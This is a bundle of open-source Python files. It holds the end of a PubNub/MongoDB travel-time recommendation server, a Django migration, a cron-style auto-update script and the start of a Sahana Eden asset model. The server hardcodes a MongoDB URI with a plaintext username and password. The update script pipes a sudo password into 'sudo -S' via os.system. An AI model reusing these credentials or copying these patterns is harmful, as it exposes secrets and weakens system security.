timediffinminutes = [] # ILLUSTRATION STEP 3 --> Update all predicted time durations with the TDO value if (proceed == True): for j in realtimeinminutes: timediffinminutes.append((((float(j)-(TheoriticalTravelDuration)))+TimeDurationOffset)) DesiredArrivalTimeIndexInList = -1 for i in range(len(time)): if (int(DesiredArrivalTime.strftime("%H")) == int(time[i].strftime("%H")) and int(DesiredArrivalTime.strftime("%M")) == int(time[i].strftime("%M"))): DesiredArrivalTimeIndexInList = time.index(time[i]) try: if DesiredArrivalTimeIndexInList != -1: pred_minutes = [] for i in range(len(timediffinminutes)): pred_minutes.append(float(timediffinminutes[i]+TheoriticalTravelDuration)) # ILLUSTRATION STEP 4 --> Handled as part of the overall flow of STEP 6 # ILLUSTRATION STEP 5 --> Calculate Recommendation Reference Start Time(RRST) from the DAT and TTD RecommendationRefferenceStartTime = int(DesiredArrivalTimeIndexInList-((TheoriticalTravelDuration+TimeDurationOffset)/10)) i = RecommendationRefferenceStartTime recommendationFlag = True checkedOnce = [] recommendationResult = {} listlen = len(time) j = 0 while (recommendationFlag == True): predictedArrivalTime = time[i]+datetime.timedelta(minutes=pred_minutes[i]) replaceapproach = predictedArrivalTime.replace(tzinfo=pytz.timezone(client_data[clientID]['timeZone'])) zone = pytz.timezone(client_data[clientID]["timeZone"]) predictedArrivalTime = zone.localize(predictedArrivalTime) diff = DesiredArrivalTime - predictedArrivalTime diff_minutes = (diff.days *24*60)+(diff.seconds/60) # ILLUSTRATION STEP 6.3 --> Checking for the onTime if (diff_minutes == 0): #This condition is the top priority pred_minutesReal = pred_minutes[i]-TimeDurationOffset # ILLUSTRATION STEP 6.3.1 --> Return the latest ontime recommendations to the user recommendationResult.update({"onTime":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach ontime","pred_minutesReal":pred_minutesReal}}) recommendationFlag = False # ILLUSTRATION STEP 6.6(Condition)--> Checking for the early elif (0<=diff_minutes<=10): pred_minutesReal = pred_minutes[i]-TimeDurationOffset if(time[i] not in checkedOnce): checkedOnce.append(time[i]) # ILLUSTRATION STEP 6.1,6.2 --> Derive the latest Recommendation recommendationResult.update({"Early":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) early"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}}) # ILLUSTRATION STEP 6.6(Operation) --> Move RRST 10min Forward i+=1 else: # ILLUSTRATION 6.4.1(Scenario 1) --> Return the latest late and early recommendations to the user recommendationResult.update({"Early":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) early"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}}) recommendationFlag = False # ILLUSTRATION STEP 6.7(Condition) --> Checking for the late else: if diff_minutes <0: pred_minutesReal = pred_minutes[i]-TimeDurationOffset if (time[i] not in checkedOnce): checkedOnce.append(time[i]) # ILLUSTRATION STEP 6.1,6.2 --> Derive the latest Recommendation recommendationResult.update({"Late":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) late"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}}) # ILLUSTRATION STEP 6.7(Operation) --> Move RRST 10min Backward i-=1 else: # ILLUSTRATION 6.4.1(Scenario 2) --> Return the latest early and late recommendations to the user recommendationResult.update({"Late":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) late"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}}) recommendationFlag = False else: i+=1 recommresult = [] for val in recommendationResult.keys(): recommresult.append(recommendationResult[val]) pub_dict = {"responseType":1,"route_name":client_data[clientID]['routeName'],"arrival_time":str(DesiredArrivalTime.replace(tzinfo=None)),"recommendation":recommresult} publish_handler(client_data[clientID]["clientID"],pub_dict) logging.info("The sent message for the recommendationmessage%s\n"%(str(pub_dict))) client_data[clientID].update({"recommndsentproceed":False}) except Exception as e: logging.error("The error occured in recommalgoinnerError is %s,%s\n"%(e,type(e))) result = {"responseType":4,"message":"oops!! Internal problem"} publish_handler(clientID,result) except Exception as recommalgoError: result = {"responseType":4,"message":"oops!! Internal problem"} publish_handler(clientID,result) logging.error("The error occured in recommalgoError is %s,%s\n"%(recommalgoError,type(recommalgoError))) '''**************************************************************************************** Function Name : Alerts (Algorithm operation) Description : Function used to get and send the Alerts to the client Parameters : clientID - client's UUID alert - Flag(True-->When journey started , False -->before journey) internal operation purpose ****************************************************************************************''' def Alerts(clientID,alert): try: Limit = 1 alertList = [] routeName = client_data[clientID]["routeName"] alertcursorproceed = False length = -1 try: #Alerts are in the ttobgcoll collection so getting the latest alerts for the route for alertdatedoc in newttobackground.ttobgcoll.find({"route":routeName}).sort('recorddate', pymongo.DESCENDING).limit(Limit): endDate = alertdatedoc['recorddate'] for alertdoc in newttobackground.ttobgcoll.find({"route":routeName,"recorddate":endDate}): length = len(alertdoc['traffic']['incidents']) alertcursorproceed = True except Exception as e: logging.error("The latestalertcursor error is %s,%s\n"%(e,type(e))) alertseverity = [] if (alertcursorproceed == True and length != -1): for i in range(length): if alertdoc['traffic']['incidents'][i]['type'] == 4: alertList.append({"eventType":alertdoc['traffic']['incidents'][i]['type'],"shortDesc":alertdoc['traffic']['incidents'][i]['shortDesc']}) alertseverity.append(alertdoc['traffic']['incidents'][i]['severity']) if (len(alertseverity)>1): secltdalert = max(alertseverity) maxseverealertIndex = alertseverity.index(secltdalert) alertList = [alertList[maxseverealertIndex]] alertpub_dict = {"responseType":2,"message":alertList} logging.info("AlertsMessage-->%s,%s\n"%(str(alertpub_dict),str(clientID))) # if there are any alerts then send or dont if (len(alertList)>0): if alert == True: alertpublish_handler(clientID,alertpub_dict) else: publish_handler(clientID,alertpub_dict) else: pass except Exception as alertError: logging.error("The error occured in alertError is %s,%s\n"%(alertError,type(alertError))) logging.info(str(alertdoc)+"\n") '''**************************************************************************************** Function Name : beforeJourneyTenminUpdate (Algorithm operation) Description : Function used invoke the beforeJourney function every ten minute ****************************************************************************************''' def beforeJourneyTenminUpdate(): while True: try: global g_minit,g_sleepTime,g_divCompare i = 0 while True: if(int(datetime.datetime.now().strftime("%M"))%g_minit == g_divCompare): if (len(beforeJourneyClientList.keys())>0): localDictbeforeJourneyupdate = client_data for cid in beforeJourneyClientList.keys(): numofclients = len(beforeJourneyClientList.keys()) if cid in beforeJourneyClientList.keys(): if i<numofclients: try: if cid in client_data.keys(): client_data[cid].update({"everyTenminproceed":True}) i+=1 except Exception as e: logging.error("The beforeJourneyTenminUpdateinternalError Exception is %s,%s\n"%(e,type(e))) else: i = 0 time.sleep(g_sleepTime) except Exception as beforeJourneyTenminUpdateError: logging.error("The error occured in beforeJourneyTenminUpdateError is %s,%s\n"%(beforeJourneyTenminUpdateError,type(beforeJourneyTenminUpdateError))) '''**************************************************************************************** Function Name : startedJourneyTenminUpdate (Algorithm operation) Description : Function used invoke the startedJourney function every ten minute ****************************************************************************************''' def startedJourneyTenminUpdate(): while True: try: global g_minit,g_sleepTime,g_divCompare i = 0 while True: if (int(datetime.datetime.now().strftime("%M"))%g_minit == g_divCompare): if (len(startedJourneyClientList.keys())>0): localDictStartedJourneyupdate = client_data for cid in startedJourneyClientList.keys(): if cid in commonStartedClientIDList: numofclients = len(startedJourneyClientList.keys()) if i<numofclients: try: if cid in startedJourneyClientList.keys(): startedJourneyClientList[cid].update({"alertsentproceed":True}) if cid in client_data.keys(): client_data[cid].update({"everyTenminproceed":True}) i+=1 except Exception as e: logging.error("The startedJourneyTenminUpdateinternalError Exception is %s,%s\n"%(e,type(e))) else: i = 0 time.sleep(g_sleepTime) except Exception as startedJourneyTenminUpdateError: logging.error("The error occured in startedJourneyTenminUpdateError is %s,%s\n"%(startedJourneyTenminUpdateError,type(startedJourneyTenminUpdateError))) '''**************************************************************************************** Function Name : stopJourney (Algorithm operation) Description : Function used to delete the invalid clients from the internal Algorithm operations ****************************************************************************************''' def stopJourney(stpCid): # Deleting clients from only commonclient lists and client_data try: delCid = stpCid if delCid in client_data.keys(): del client_data[delCid] if delCid in commonClientIDList: index = commonClientIDList.index(delCid) del commonClientIDList[index] if delCid in commonStartedClientIDList: index = commonStartedClientIDList.index(delCid) del commonStartedClientIDList[index] except Exception as stopJourneyError: logging.error("The error occured in stopJourneyError is %s,%s\n"%(stopJourneyError,type(stopJourneyError))) '''**************************************************************************************** Function Name : recommendationAlertFunc (Algorithm operation) Description : Function used to get and send the Alerts to the client Parameters : recommtime - client's Recommended Departure Time cid - client's UUID pred_minutesReal - The travel duration time for the Recommended Departure Time ****************************************************************************************''' def recommendationAlertFunc(recommtime,cid,pred_minutesReal): try: recommendationAlertPredictions = [] recommendationAlertTime = [] recommendationAlertIndex = -1 recommtime = recommtime.replace(second=0) try: cursor = newttobackground.ttoresultcoll.find({"route":client_data[cid]['routeName']}) for doc in cursor: recommendationAlertPredictions.append(doc['predictioninmins']) recommendationAlertTime.append(doc['time'].replace(second=0)) if recommtime in recommendationAlertTime: recommendationAlertIndex = recommendationAlertTime.index(recommtime) except Exception as e: logging.error("The error occured in internal recommendationAlertFunc is %s,%s\n"%(e,type(e))) if (recommendationAlertIndex != -1): val = int(recommendationAlertPredictions[recommendationAlertIndex]) * 60 pred_minutesReal = int(pred_minutesReal) * 60 if pred_minutesReal == val: logging.info("recommendationAlertMessage--> no change%s,%s\n"%(str(val),str(pred_minutesReal))) return 1,0 else: diff = pred_minutesReal - val logging.info("recommendationAlertMessage-->change in predictions %s,%s,%s\n"%(str(val),str(pred_minutesReal),str(float(diff)/60.0))) return 0,float(diff)/60.0 else: logging.info("The recommtime-->%s"%(str(recommtime))) pass except Exception as recommendationAlertFuncError: logging.error("The error occured in recommendationAlertFuncError is %s,%s\n"%(recommendationAlertFuncError,type(recommendationAlertFuncError))) '''**************************************************************************************** Function Name : beforeJourney (Algorithm operation) Description : Function responsible for updates regarding the change in Recommendation change and Alerts before journey starts ****************************************************************************************''' def beforeJourney(): try: global g_minit,g_divCompare while True: if (len(beforeJourneyClientList.keys())>0): for cid in beforeJourneyClientList.keys(): if cid in commonClientIDList: localDict = client_data[cid] presentrouteTime = datetime.datetime.now(pytz.timezone(localDict['timeZone'])) recommendedTime = beforeJourneyClientList[cid]["recommendedDepTime"] diff = recommendedTime-presentrouteTime diffMin = (diff.days * 24 * 60) + (diff.seconds/60) # executes every10min thats why one more condition checking for 10mins if (0<=diffMin<= 720): val = datetime.datetime.now(pytz.timezone(localDict['timeZone'])).strftime("%M") if (int(val)%g_minit == g_divCompare and localDict['everyTenminproceed'] == True):#make sure you are dividing with 10 for the 10min purpose arrivalTime = datetime.datetime.strptime(localDict["arrivalTime"], "%Y-%m-%d %H:%M:%S") zone = pytz.timezone(localDict["timeZone"]) arrivalTime = zone.localize(arrivalTime) existedRecommendation = beforeJourneyClientList[cid]["recommendedDepTime"] existedpredminutesReal = beforeJourneyClientList[cid]["pred_minutesReal"] existedRecommendation = existedRecommendation.replace(tzinfo=None) result,val = recommendationAlertFunc(existedRecommendation,cid,existedpredminutesReal) logging.info("beforejourneyMessage-->clients now%s\n"%(str(cid))) if result == 0:#Different prediction localDict.update({"recommndsentproceed":True}) # means new recommendation localDict.update({"everyTenminproceed":False}) # means comeback after 10mins if val > 0: message = {"responseType":3,"message":"You should start %smin(s) after %s"%(int(val),str(recommendedTime.replace(second=0,tzinfo=None)))} if val < 0: message = {"responseType":3,"message":"You should start %smin(s) earlier than %s "%(abs(int(val)),str(recommendedTime.replace(second=0,tzinfo=None)))} logging.info("recommendationAlert -->%s"%(str(message))) publish_handler(cid,message) else: # # means new recommendation localDict.update({"everyTenminproceed":False}) #Alerts localDict.update({"recommndsentproceed":True}) Alerts(cid,False) localDict.update({"recommndsentproceed":False}) # updating to main dictionary if cid in client_data.keys(): client_data[cid].update({"recommndsentproceed":localDict["recommndsentproceed"],"everyTenminproceed":localDict["everyTenminproceed"]}) else: # it means client started the journey moved to startjourneylist del beforeJourneyClientList[cid] except Exception as beforejourneyError: logging.error("The error occured in beforejourneyError is %s,%s\n"%(beforejourneyError,type(beforejourneyError))) '''**************************************************************************************** Function Name : startedJourney (Algorithm operation) Description : Function responsible to send Alerts if any after journey starts ****************************************************************************************''' def startedJourney(): while True: try: global g_minit,g_sleepTime,g_divCompare while True: if (len(startedJourneyClientList.keys()) == len(commonStartedClientIDList)): localDictStartedJourney = client_data for strtCid in startedJourneyClientList.keys(): if strtCid in commonStartedClientIDList: presentrouteTimeminute = int(datetime.datetime.now(pytz.timezone(localDictStartedJourney[strtCid]['timeZone'])).strftime("%M")) if (presentrouteTimeminute%g_minit == g_divCompare and localDictStartedJourney[strtCid]['everyTenminproceed'] == True): logging.info("startedJourneyMessage--> Clients now%s\n"%(str(strtCid))) Alerts(strtCid,True) if strtCid in client_data.keys(): client_data[strtCid].update({"everyTenminproceed":False}) else: for strtCid in startedJourneyClientList.keys(): if strtCid not in commonStartedClientIDList: del startedJourneyClientList[strtCid] except Exception as startedJourneyError: logging.error("The error occured in startedJourneyError is %s,%s\n"%(startedJourneyError,type(startedJourneyError))) '''**************************************************************************************** Function Name : delCheck (Algorithm operation) Description : Function responsible to delete the expired clients ****************************************************************************************''' def delCheck(): while True: try: global g_sleepTime,g_minit i=0 while True: if (int(datetime.datetime.now().strftime("%M"))%g_minit == 0): if len(client_data.keys())>0: localDictDelcheck = client_data for clientID in localDictDelcheck.keys(): numofclients = len(localDictDelcheck.keys()) if i<numofclients: if clientID in localDictDelcheck.keys(): DAT = datetime.datetime.strptime(str(localDictDelcheck[clientID]["arrivalTime"]), "%Y-%m-%d %H:%M:%S") zone = pytz.timezone(localDictDelcheck[clientID]["timeZone"]) DAT = zone.localize(DAT) # Deleting the clients that crossed the Arrival time range. travelTime = int(localDictDelcheck[clientID]['theoryTime'])+3600 journeyEndTime = DAT + datetime.timedelta(seconds=travelTime)# journey time with extra 20min buffer presentrouteTime = datetime.datetime.now(pytz.timezone(localDictDelcheck[clientID]['timeZone'])) diff = journeyEndTime - presentrouteTime diff_minutes = (diff.days *24*60)+(diff.seconds/60) if diff_minutes<=0: # clearing the startedJourneyList dictionary. if clientID in startedJourneyClientList.keys(): logging.info("delCheckMessage--> Something to Delete in startedJourneyClientList %s,%s\n"%(str(clientID),str(DAT))) del startedJourneyClientList[clientID] if clientID in client_data.keys(): logging.info("delCheckMessage--> Something to Delete in client_data %s,%s\n"%(str(clientID),str(DAT))) del client_data[clientID] #clearing the commonStartedClientIDList. if clientID in commonStartedClientIDList: logging.info("delCheckMessage--> Something to Delete in commonStartedClientIDList %s,%s\n"%(str(clientID),str(DAT))) index = commonStartedClientIDList.index(clientID) del commonStartedClientIDList[index] else: # timerange over checking else part logging.info("delCheckMessage--> Nothing to Delete%s,%s\n"%(str(clientID),str(DAT))) else: # client_data keys checking else part pass i+=1 else: i=0 time.sleep(g_sleepTime) except Exception as delCheckError: logging.error("The error occured in delCheckError is %s,%s\n"%(delCheckError,type(delCheckError))) '''**************************************************************************************** Function Name : tto_callback (Callback operation) Description : Callback function listens to the channel for the messages Parameters : message - message from the client channel - UUID of the client ****************************************************************************************''' def tto_callback(message,channel): try: if message.has_key("requestType") and message.has_key("CID"): logging.info(str(message)+"\n")#printing the message we receive from the client clientID = str(message['CID']) requestType = int(message['requestType']) if clientID in client_data.keys(): if requestType == 1: # request for the recommendation # here client should be there in the commonClientIDList because we are adding it at time of entrance if clientID not in commonClientIDList: commonClientIDList.append(clientID) routeName = str(message['routeName'])#only in requesttype 1 we will get it # adding necessary client data if not client_data.has_key(clientID): client_data.setdefault(clientID,{"clientID":clientID,"timeZone":zone_ttimedct[routeName][0],"theoryTime":zone_ttimedct[routeName][1],"arrivalTime":str(message['arrivalTime']),"routeName":routeName,"everyTenminproceed":False,"recommndsentproceed":True,"alertsentproceed":False}) # datetime format arrivalTime = datetime.datetime.strptime(str(message['arrivalTime']), "%Y-%m-%d %H:%M:%S") # adding timezone using localizing technique zone = pytz.timezone(client_data[clientID]["timeZone"]) arrivalTime = zone.localize(arrivalTime) recommendationAlgoFunc(arrivalTime,clientID)#calling the recommendation algorithm function if requestType == 2: #request for starting the journey startTime = datetime.datetime.strptime(str(message["startTime"]),"%Y-%m-%d %H:%M:%S") zone = pytz.timezone(client_data[clientID]["timeZone"]) arrivalTime = zone.localize(startTime) # sharing client id with started journey list so that there wont any problem for the dependency functions if clientID not in commonStartedClientIDList: commonStartedClientIDList.append(clientID) if not startedJourneyClientList.has_key(clientID): startedJourneyClientList.setdefault(clientID,{"clientID":clientID,"recommendedTime":arrivalTime}) # incase if the client started journey immeddiately before entering into the beforejourney list if clientID in commonClientIDList: index = commonClientIDList.index(clientID) del commonClientIDList[index] # updating alertsentproceed so the alerts will work for the client client_data[clientID].update({"alertsentproceed":True}) # callling the alertsent function Alerts(clientID,True) logging.info("The clients in startedJourney stage %s\n"%(str(startedJourneyClientList))) if requestType == 3: #when clients ends the journey stpCid = str(message['CID']) stopJourney(stpCid) if requestType == 4:# confirmation from the client to remember the query recommendedDepTime = datetime.datetime.strptime(message['recommendedDepTime'], "%Y-%m-%d %H:%M:%S") zone = pytz.timezone(client_data[clientID]["timeZone"]) recommendedDepTime = zone.localize(recommendedDepTime) if not beforeJourneyClientList.has_key(clientID): beforeJourneyClientList.setdefault(clientID,{"clientID":clientID,"recommendedDepTime":recommendedDepTime,"pred_minutesReal":message['pred_minutesReal']}) logging.info("The clients in the beforeJourney stage%s\n"%(str(beforeJourneyClientList))) else: if requestType == 1: if clientID not in commonClientIDList: commonClientIDList.append(clientID) routeName = str(message['routeName'])#only in requesttype 1 we will get it # adding necessary client data if not client_data.has_key(clientID): client_data.setdefault(clientID,{"clientID":clientID,"timeZone":zone_ttimedct[routeName][0],"theoryTime":zone_ttimedct[routeName][1],"arrivalTime":str(message['arrivalTime']),"routeName":routeName,"everyTenminproceed":False,"recommndsentproceed":True,"alertsentproceed":False}) # datetime format arrivalTime = datetime.datetime.strptime(message['arrivalTime'], "%Y-%m-%d %H:%M:%S") # adding timezone using localizing technique zone = pytz.timezone(client_data[clientID]["timeZone"]) arrivalTime = zone.localize(arrivalTime) recommendationAlgoFunc(arrivalTime,clientID)#calling the recommendation algorithm function else: pass except Exception as callbackError: logging.error("The error occured in callbackError is %s,%s\n"%(callbackError,type(callbackError))) '''**************************************************************************************** Function Name : error Description : If error in the channel, prints the error Parameters : message - error message ****************************************************************************************''' def error(message): logging.error("ERROR on Pubnub: " + str(message)+"\n") '''**************************************************************************************** Function Name : connect Description : Responds if server connects with pubnub Parameters : message - connect message ****************************************************************************************''' def connect(message): logging.info("CONNECTED\n") '''**************************************************************************************** Function Name : reconnect Description : Responds if server reconnects with pubnub Parameters : message - reconnect message ****************************************************************************************''' def reconnect(message): logging.info("RECONNECTED\n") '''**************************************************************************************** Function Name : disconnect Description : Responds if server disconnects from pubnub Parameters : message - disconnect message ****************************************************************************************''' def disconnect(message): logging.info("DISCONNECTED\n") '''**************************************************************************************** Function Name : channel_subscriptions (pubnub operation) Description : Function intializes the pubnub subscribing to a specific channel ****************************************************************************************''' def channel_subscriptions(): global pubnub try: pubnub.subscribe(channels='ttotest1', callback=tto_callback,error=error, connect=connect, reconnect=reconnect, disconnect=disconnect) except Exception as channelsubserror: logging.error("The error occured in channel_subscriptions is %s,%s\n"%(channelsubserror,type(channelsubserror))) '''**************************************************************************************** Function Name : mongoInit (Mongodb operation) Description : Function initalizes the mongodb connection ****************************************************************************************''' def mongoInit(): global newttobackground try: uri ='mongodb://rajeevtto:radiostud@ds035315-a0.mongolab.com:35315,ds035315-a1.mongolab.com:35315/newttobackground?replicaSet=rs-ds035315' client = MongoClient(uri) newttobackground = client.newttobackground logging.info('connected\n') except Exception as e: logging.error("The error occured in mongoInit is %s,%s\n"%(e,type(e))) '''**************************************************************************************** Function Name : pub_Init (pubnub operation) Description : Function intializes the pubnub connection ****************************************************************************************''' def pub_Init(): global pubnub try: pubnub = Pubnub(publish_key=pub_key,subscribe_key=sub_key) return True except Exception as pubException: logging.error("The pubException is %s,%s\n"%(pubException,type(pubException))) return False '''**************************************************************************************** Function Name : Init (Functional operation) Description : Function initializes the pubinit and mongoinit ****************************************************************************************''' def Init(): dBreturn = mongoInit() pbreturn = pub_Init() if (dBreturn == False or pbreturn == False): logging.info("Program Terminated\n") sys.exit() else: channel_subscriptions() if __name__ == '__main__': try: f1 = threading.Thread(target = Init) f2 = threading.Thread(target = beforeJourney) f3 = threading.Thread(target = startedJourney) f4 = threading.Thread(target = beforeJourneyTenminUpdate) f5 = threading.Thread(target = startedJourneyTenminUpdate) f6 = threading.Thread(target = delCheck) f1.start() f2.start() f4.start() f3.start() f5.start() f6.start() except Exception as e: logging.error("The main Exception is %s,%s\n"%(e,type(e)))
shyampurk/tto-bluemix
ttoServer/ttoServer.py
Python
mit
37,445
# -*- coding: utf-8 -*- # Generated by Django 1.11.2 on 2017-07-12 15:31 from __future__ import unicode_literals from django.db import migrations, models import django.utils.timezone import picklefield.fields import src.models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='CallLater', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(default='', max_length=64, verbose_name='additional lookup field')), ('time_to_run', models.DateTimeField(default=django.utils.timezone.now)), ('time_to_stop', models.DateTimeField(blank=True, null=True)), ('function', picklefield.fields.PickledObjectField(editable=False)), ('args', picklefield.fields.PickledObjectField(editable=False, null=True)), ('kwargs', picklefield.fields.PickledObjectField(editable=False, null=True)), ('repeat', models.PositiveIntegerField(default=1)), ('every', models.DurationField(blank=True, null=True)), ('when_check_if_failed', models.DateTimeField(default=src.models.far_future_fail_timeout)), ('retries', models.PositiveIntegerField(default=3)), ('timeout_retries', models.PositiveIntegerField(default=2)), ('problem', models.BooleanField(default=False)), ], ), ]
andytwoods/zappa-call-later
zappa-call-later/migrations/0001_initial.py
Python
mit
1,577
import os from decouple import config sudoPassword = config('SUDOPASSWORD') def update(): """ Automatisches Update des Reservierungssystems über Github """ try: command_stop = 'sudo supervisorctl stop abwreservierung && sudo supervisorctl start abwreservierung && sudo chmod +x startup' os.system('echo %s|sudo -S %s' % (sudoPassword, command_stop)) except: pass try: os.system('cd /home/webserver/abwreservierung && git pull') except: pass try: command_start = 'sudo supervisorctl start abwreservierung' os.system('echo %s|sudo -S %s' % (sudoPassword, command_start)) except: pass try: command_chmod = 'sudo chmod +x startup' os.system('echo %s|sudo -S %s' % (sudoPassword, command_chmod)) except: pass def alte_reservierungen(): """ Automatisches entfernen der alten Reservierungen """ os.system("/bin/bash -c 'source ../django-server/bin/activate && python src/manage.py alte_reservierungen && deactivate'") scheduler = BlockingScheduler() scheduler.add_job(update, 'cron', day_of_week='sun', hour=12) scheduler.add_job(alte_reservierungen, 'cron', day_of_week="mon-fri", hour=17) scheduler.start()
holytortoise/abwreservierung
auto_process.py
Python
mit
1,255
# -*- coding: utf-8 -*- """ Sahana Eden Assets Model @copyright: 2009-2012 (c) Sahana Software Foundation @license: MIT Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ __all__ = ["S3AssetModel", "asset_rheader", "asset_types", "asset_log_status", ] from gluon import * from gluon.sqlhtml import RadioWidget from gluon.storage import Storage from ..s3 import * ASSET_TYPE_VEHICLE = 1 # => Extra Tab(s) for Registration Documents, Fuel Efficiency ASSET_TYPE_RADIO = 2 # => Extra Tab(s) for Radio Channels/Frequencies ASSET_TYPE_TELEPHONE = 3 # => Extra Tab(s) for Contact Details & Airtime Billing ASSET_TYPE_OTHER = 4 # => No extra Tabs # To pass to global scope asset_types = { "VEHICLE" : ASSET_TYPE_VEHICLE, "RADIO" : ASSET_TYPE_RADIO, "TELEPHONE" : ASSET_TYPE_TELEPHONE, "OTHER" : ASSET_TYPE_OTHER, } ASSET_LOG_SET_BASE = 1 ASSET_LOG_ASSIGN = 2 ASSET_LOG_RETURN = 3 ASSET_LOG_CHECK = 4 ASSET_LOG_REPAIR = 5 ASSET_LOG_DONATED = 32 ASSET_LOG_LOST = 33 ASSET_LOG_STOLEN = 34 ASSET_LOG_DESTROY = 35 # To pass to global scope asset_log_status = { "SET_BASE" : ASSET_LOG_SET_BASE, "ASSIGN" : ASSET_LOG_ASSIGN, "RETURN" : ASSET_LOG_RETURN, "CHECK" : ASSET_LOG_CHECK, "REPAIR" : ASSET_LOG_REPAIR, "DONATED" : ASSET_LOG_DONATED, "LOST" : ASSET_LOG_LOST, "STOLEN" : ASSET_LOG_STOLEN, "DESTROY" : ASSET_LOG_DESTROY, } #SITE = 1 #LOCATION = 2 # ============================================================================= class S3AssetModel(S3Model): """ Asset Management """ names = ["asset_asset", "asset_log", "asset_log_prep", "asset_asset_id", ] def model(self): T = current.T db = current.db auth = current.auth request = current.request s3 = current.response.s3 settings = current.deployment_settings currency_type = s3.currency_type person_id = self.pr_person_id location_id = self.gis_location_id organisation_id = self.org_organisation_id organisation_represent = self.org_organisation_represent site_id = self.org_site_id room_id = self.org_room_id item_id = self.supply_item_entity_id supply_item_id = self.supply_item_id supply_item_represent = self.supply_item_represent #supplier_id = self.proc_supplier_id UNKNOWN_OPT = current.messages.UNKNOWN_OPT vehicle = settings.has_module("vehicle") s3_date_format = settings.get_L10n_date_format() s3_date_represent = lambda dt: S3DateTime.date_represent(dt, utc=True) # Shortcuts add_component = self.add_component comments = s3.comments configure = self.configure crud_strings = s3.crud_strings define_table = self.define_table meta_fields = s3.meta_fields super_link = self.super_link #-------------------------------------------------------------------------- # Assets # asset_type_opts = { ASSET_TYPE_VEHICLE : T("Vehicle"), #ASSET_TYPE_RADIO : T("Radio"), #ASSET_TYPE_TELEPHONE : T("Telephone"), ASSET_TYPE_OTHER : T("Other") } asset_item_represent = lambda id: supply_item_represent(id, show_um = False) ctable = self.supply_item_category itable = self.supply_item tablename = "asset_asset" table = define_table(tablename, super_link("track_id", "sit_trackable"), super_link("doc_id", "doc_entity"), Field("number", label = T("Asset Number")), item_id, supply_item_id(represent = asset_item_represent, requires = IS_ONE_OF(db((ctable.can_be_asset == True) & \ (itable.item_category_id == ctable.id)), "supply_item.id", asset_item_represent, sort=True, ), script = None, # No Item Pack Filter ), # @ToDo: Can we set this automatically based on Item Category? Field("type", "integer", readable = vehicle, writable = vehicle, requires = IS_IN_SET(asset_type_opts), default = ASSET_TYPE_OTHER, represent = lambda opt: \ asset_type_opts.get(opt, UNKNOWN_OPT), label = T("Type")), Field("sn", label = T("Serial Number")), # @ToDo: Switch to using proc_supplier #supplier_id(), Field("supplier", label = T("Supplier")), Field("purchase_date", "date", label = T("Purchase Date"), requires = IS_NULL_OR(IS_DATE(format = s3_date_format)), represent = s3_date_represent, widget = S3DateWidget()), Field("purchase_price", "double", default=0.00, represent=lambda v, row=None: IS_FLOAT_AMOUNT.represent(v, precision=2)), currency_type("purchase_currency"), # Base Location, which should always be a Site & set via Log location_id(readable=False, writable=False), # Populated onaccept of the log to make a component tab person_id("assigned_to_id", readable=False, writable=False, comment=self.pr_person_comment(child="assigned_to_id")), comments(), *(s3.address_fields() + meta_fields())) # CRUD strings ADD_ASSET = T("Add Asset") LIST_ASSET = T("List Assets") crud_strings[tablename] = Storage( title_create = ADD_ASSET, title_display = T("Asset Details"), title_list = LIST_ASSET, title_update = T("Edit Asset"), title_search = T("Search Assets"), title_upload = T("Import Assets"), subtitle_create = T("Add New Asset"), subtitle_list = T("Assets"), label_list_button = LIST_ASSET, label_create_button = ADD_ASSET, label_delete_button = T("Delete Asset"), msg_record_created = T("Asset added"), msg_record_modified = T("Asset updated"), msg_record_deleted = T("Asset deleted"), msg_list_empty = T("No Assets currently registered")) # Reusable Field asset_id = S3ReusableField("asset_id", db.asset_asset, sortby="number", requires = IS_NULL_OR(IS_ONE_OF(db, "asset_asset.id", self.asset_represent, sort=True)), represent = self.asset_represent, label = T("Asset"), ondelete = "CASCADE") table.virtualfields.append(AssetVirtualFields()) # Search Method asset_search = S3Search( # Advanced Search only advanced=( S3SearchSimpleWidget( name="asset_search_text", label=T("Search"), comment=T("You can search by asset number, item description or comments. You may use % as wildcard. Press 'Search' without input to list all assets."), field=[ "number", "item_id$name", #"item_id$category_id$name", "comments", ] ), S3SearchLocationHierarchyWidget( name="asset_search_L1", field="L1", cols = 3 ), S3SearchLocationHierarchyWidget( name="asset_search_L2", field="L2", cols = 3 ), S3SearchLocationWidget( name="asset_search_map", label=T("Map"), ), S3SearchOptionsWidget( name="asset_search_item_category", 